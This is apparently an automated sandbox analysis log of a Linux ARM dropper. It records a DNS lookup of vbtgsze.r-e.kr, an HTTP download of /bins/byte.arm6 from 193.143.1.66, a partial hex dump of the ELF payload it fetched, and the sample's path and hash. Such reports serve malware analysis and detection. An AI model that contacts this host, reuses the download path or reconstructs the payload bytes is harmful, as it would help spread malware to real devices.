          Dec 30, 2024 17:28:59.400425911 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.400434971 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.400777102 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.618182898 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.618221045 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.658135891 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.662972927 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.662983894 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.662995100 CET8042018193.143.1.66192.168.2.14
          Dec 30, 2024 17:28:59.663008928 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:28:59.664225101 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:29:00.322149992 CET4201880192.168.2.14193.143.1.66
          Dec 30, 2024 17:29:00.326946974 CET8042018193.143.1.66192.168.2.14
          TimestampSource PortDest PortSource IPDest IP
          Dec 30, 2024 17:28:57.800127983 CET5448953192.168.2.141.1.1.1
          Dec 30, 2024 17:28:58.416805029 CET53544891.1.1.1192.168.2.14
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 30, 2024 17:28:57.800127983 CET192.168.2.141.1.1.10x8011Standard query (0)vbtgsze.r-e.krA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 30, 2024 17:28:58.416805029 CET1.1.1.1192.168.2.140x8011No error (0)vbtgsze.r-e.kr193.143.1.66A (IP address)IN (0x0001)false
          Session IDSource IPSource PortDestination IPDestination Port
          0192.168.2.1442018193.143.1.6680
          TimestampBytes transferredDirectionData
          Dec 30, 2024 17:28:58.424959898 CET46OUTGET /bins/byte.arm6 HTTP/1.0
          Data Raw: 00 00
          Data Ascii:
          Dec 30, 2024 17:28:59.107444048 CET1236INHTTP/1.0 200 OK
          Accept-Ranges: bytes
          Content-Length: 94544
          Content-Type: application/octet-stream
          Last-Modified: Mon, 30 Dec 2024 12:54:41 GMT
          Date: Mon, 30 Dec 2024 16:28:59 GMT
          Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 54 81 00 00 34 00 00 00 70 6f 01 00 02 00 00 04 34 00 20 00 03 00 28 00 0c 00 0b 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 e8 62 01 00 e8 62 01 00 05 00 00 00 00 80 00 00 01 00 00 00 ec 62 01 00 ec 62 02 00 e8 62 02 00 14 0c 00 00 c4 b3 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 fc 6e 02 00 00 00 00 00 e8 62 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff 2f 11 30 00 9f e5 00 30 90 e5 00 00 53 e3 03 00 00 0a 24 30 9f e5 00 00 53 e3 0f e0 a0 11 13 ff 2f 11 04 d0 8d e2 04 e0 9d e4 1e ff 2f e1 00 00 00 00 e8 62 02 00 00 6f 02 00 f4 62 02 00 00 00 [TRUNCATED]
          Data Ascii: ELF(T4po4 (bbbbbQtd-L@-,@0S 0S/00@/nb-@0SM88/00S$0S//bob ---0>9O-@PMM 0p 0W@M'PQO/}T}O7Y; 0@p0C)pG0Q`0 0 $)21CP 1'0S@7!$,!$<$,0!"< 44<0'!t;!20bcP(xL pD8V^#V*#&V.#Xo+ B@p )pG)0<00 S ,|0C+0 SY` [TRUNCATED]
          Dec 30, 2024 17:28:59.107460022 CET1236INData Raw: 00 00 0a 00 00 53 e3 51 00 00 0a 02 00 53 e3 8f 00 00 0a 05 00 53 e3 f5 00 00 0a 08 00 53 e3 aa 00 00 0a 09 00 53 e3 9d 00 00 1a 00 c0 96 e5 ac 22 a0 e1 02 21 a0 e1 b5 ed 8d e2 0e 20 82 e0 28 11 12 e5 1f 00 0c e2 08 30 43 e2 13 10 81 e1 0c 00 5a
          Data Ascii: SQSSSS"! (0CZ(XoZP(+-,]( 0(@(T`@p" (1
          Dec 30, 2024 17:28:59.107469082 CET1236INData Raw: 15 9f e5 00 00 87 e0 9a 25 00 eb 3a 00 a0 e3 f4 21 00 eb 07 00 a0 e1 8c 25 00 eb 00 10 a0 e3 00 40 a0 e1 3a 00 a0 e3 bd 21 00 eb 00 10 a0 e1 04 00 87 e0 8f 25 00 eb 3a 00 a0 e3 c1 21 00 eb 07 00 a0 e1 81 25 00 eb 40 15 9f e5 00 00 87 e0 88 25 00
          Data Ascii: %:!%@:!%:!%@%;!z%@;!}%;!o%v%<!h%@<!k%<!]%d%B!V%
          Dec 30, 2024 17:28:59.107480049 CET720INData Raw: 20 00 eb 6e fd ff ea 4b 00 a0 e3 c3 20 00 eb 00 10 a0 e3 4b 00 a0 e3 8f 20 00 eb 00 10 a0 e1 14 00 86 e2 61 24 00 eb 4b 00 a0 e3 93 20 00 eb 63 fd ff ea 4a 00 a0 e3 b8 20 00 eb 00 10 a0 e3 4a 00 a0 e3 84 20 00 eb 00 10 a0 e1 14 00 86 e2 56 24 00
          Data Ascii: nK K a$K cJ J V$J XI Iy K$I} MH Hn @$Hr B ,04O-QMtM@P,(
          Dec 30, 2024 17:28:59.107490063 CET1236INData Raw: 00 00 da 00 50 a0 e1 00 b0 a0 e3 00 30 a0 e3 00 20 e0 e3 2c 10 9d e5 00 20 85 e5 04 30 c5 e5 0b 00 a0 e1 9b 25 00 eb 28 c0 9d e5 81 32 a0 e1 81 31 43 e0 0c 60 83 e0 10 20 96 e5 85 ef 85 e2 0e 00 a0 e1 08 10 a0 e1 10 20 85 e5 30 e0 8d e5 a5 23 00
          Data Ascii: P0 , 0%(21C` 0#2/S0# 0,//02Z#Y##0S@$,!$<$,0!"< 4
          Dec 30, 2024 17:28:59.107503891 CET947INData Raw: 30 83 e2 68 51 8c e5 64 41 8c e5 64 e0 8e e2 04 20 a0 e1 00 e0 8d e5 4e 2f 00 eb 05 1a 8d e2 68 31 91 e5 03 00 90 e1 c1 01 00 1a ac 35 1a e5 a3 22 a0 e1 1f 10 03 e2 02 c1 a0 e1 a8 45 4a e5 c3 ff ff ea 04 30 96 e5 00 00 53 e3 04 30 a0 13 a8 35 46
          Data Ascii: 0hQdAd N/h15"EJ0S05F5FZ0!0""Y"Y]"Q"W"K"Q"E" K"
          Dec 30, 2024 17:28:59.107512951 CET1236INData Raw: 01 c0 83 e2 0c 00 52 e1 6c c1 81 e5 e8 ff ff ca 14 00 9d e5 8e 21 00 eb 14 20 9d e5 dc 13 9f e5 00 00 82 e0 94 21 00 eb 14 00 9d e5 88 21 00 eb 14 30 9d e5 c4 13 9f e5 00 00 83 e0 8e 21 00 eb 3c c0 9d e5 00 00 5c e3 05 00 00 0a 14 00 9d e5 7f 21
          Data Ascii: Rl! !!0!<\!<!ZNX"PEr! 9r.Q"p! 005F\4 %A540cS
          Dec 30, 2024 17:28:59.107523918 CET248INData Raw: 96 1c 00 eb 0b 10 a0 e1 00 20 a0 e1 10 00 9d e5 1a 21 00 eb 01 00 70 e3 01 30 a0 13 00 30 8a 15 05 10 a0 e1 45 00 a0 e3 04 50 8a e5 8b 1c 00 eb 0b 10 a0 e1 00 20 a0 e1 10 00 9d e5 0f 21 00 eb 01 00 70 e3 28 00 00 0a 05 10 a0 e1 45 00 a0 e3 82 1c
          Data Ascii: !p00EP !p(E !0 S@@`dX!0k pPQ,@p 00P2 @Dc P00
          Dec 30, 2024 17:28:59.107532024 CET1236INData Raw: 00 70 a0 e3 07 10 a0 e1 42 00 a0 e3 08 70 8a e5 57 1c 00 eb 0b 10 a0 e1 00 20 a0 e1 10 00 9d e5 db 20 00 eb 51 6c e0 e3 01 00 70 e3 24 60 46 e2 28 00 00 0a 07 10 a0 e1 42 00 a0 e3 4c 1c 00 eb 0b 10 a0 e1 00 20 a0 e1 10 00 9d e5 d0 20 00 eb 10 c0
          Data Ascii: pBpW Qlp$`F(BL 0 S@@Pd0"05 pPQ@p00p@C- P00A#
          Dec 30, 2024 17:28:59.107541084 CET1236INData Raw: 00 00 50 e3 ae ff ff 0a 01 00 70 e3 f4 ff ff 1a 00 30 94 e5 0b 00 53 e3 ab ff ff 1a a8 35 5a e5 00 00 53 e3 4f fc ff 0a e8 ff ff ea 01 30 83 e2 a8 35 4a e5 4b fc ff ea 0b 00 a0 e1 04 10 a0 e1 ee 1e 00 eb 6d fd ff ea 68 30 a0 e3 00 30 8b e5 ac 05
          Data Ascii: Pp0S5ZSO05JKmh00!0 5%J>0S;!0 5%J4> Qlp$`F|> {0 S@@
          Dec 30, 2024 17:28:59.112548113 CET1236INData Raw: 00 30 c2 e5 cc ff ff ea 06 00 a0 e1 bf 1d 00 eb 7f 00 50 e3 a1 ff ff ca 10 00 9a e5 80 03 a0 e1 17 0d 80 e2 06 10 a0 e1 00 00 89 e0 c1 1d 00 eb 10 40 9a e5 84 43 a0 e1 17 4d 84 e2 04 40 89 e0 04 00 a0 e1 b1 1d 00 eb 7c 1b 1f e5 00 00 84 e0 b8 1d
          Data Ascii: 0P@CM@|P`e0+@CMP@PC000zO@*l`P:l


          System Behavior

          Start time (UTC):16:28:57
          Start date (UTC):30/12/2024
          Path:/tmp/dlr.arm6.elf
          Arguments:/tmp/dlr.arm6.elf
          File size:4956856 bytes
          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1